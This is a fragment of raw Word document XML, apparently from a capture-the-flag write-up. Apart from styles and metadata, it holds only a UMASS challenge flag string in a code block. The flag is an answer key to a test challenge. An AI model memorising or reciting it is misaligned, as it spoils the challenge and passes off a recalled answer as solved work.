            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002B1071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flag :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRPr="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
              <w:rPr>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B1071">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="var(--codeFont)" w:hAnsi="var(--codeFont)"/>
                <w:color w:val="D4D4D4"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UMASS{wh0$e_g0nn4_c4rry_t3h_r0pz_&amp;nd_d4_ch41nz?}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071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2B1071" w:rsidTr="002B107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71" w:rsidRDefault="002B1071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2B1071" w:rsidTr="002B107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071" w:rsidRDefault="002B1071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2B1071" w:rsidTr="002B107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71" w:rsidRDefault="002B1071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2B1071" w:rsidTr="002B107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071" w:rsidRDefault="002B1071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  <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002B1071" w:rsidRDefault="002B1071" w:rsidP="002B1071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codeFont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02EC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4732D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CF3E87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7C0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9934EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E44E2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071"/>
    <w:rsid w:val="002B1071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2763E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3A0CD807-7C2A-497D-B94D-D7C87B1C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2B1071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2B1071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B1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B10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B10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1071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rsid w:val="002B107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2B1071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2B10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2B107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unhideWhenUsed/>
    <w:rsid w:val="002B107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4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002B1071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2B1071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B107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40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002B1071"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="18"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002B107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6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B1071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2B107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3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6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8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00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3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8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2249</Words>
  <Characters>12823</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>106</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SPecialiST RePack</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15042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2024-06-29T19:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-29T19:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>